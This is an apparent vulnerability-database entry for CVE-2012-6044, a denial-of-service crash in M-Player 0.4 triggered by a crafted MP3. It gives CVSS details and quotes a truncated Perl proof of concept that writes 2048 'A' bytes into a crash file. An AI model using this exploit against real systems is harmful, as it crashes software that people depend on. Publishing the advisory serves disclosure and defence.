4.3
CVSSv2

CVE-2012-6044

Published: 26/11/2012 Updated: 29/08/2017
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
VMScore: 435
Vector: AV:N/AC:M/Au:N/C:N/I:N/A:P

Vulnerability Summary

M-Player 0.4 allows remote malicious users to cause a denial of service (crash) via a crafted MP3 file.

Vulnerable Product Search on Vulmon Subscribe to Product

mjsware m-player 4.3

Exploits

#!/usr/bin/perl # Exploit Title: M-Player 04 Local Denial of Service Vulnerability # Date: 08/01/2012 # Author: JaMbA # Download: wwwsoftpediacom/get/Multimedia/Audio/Audio-Players/M-Playershtml # Version: 04 # Tested on: Windows 7 my $file= "Crashmp3"; my $junk= "\x41" x 2048; open($FILE,">$file"); print $FILE $junk; print "\nCra ...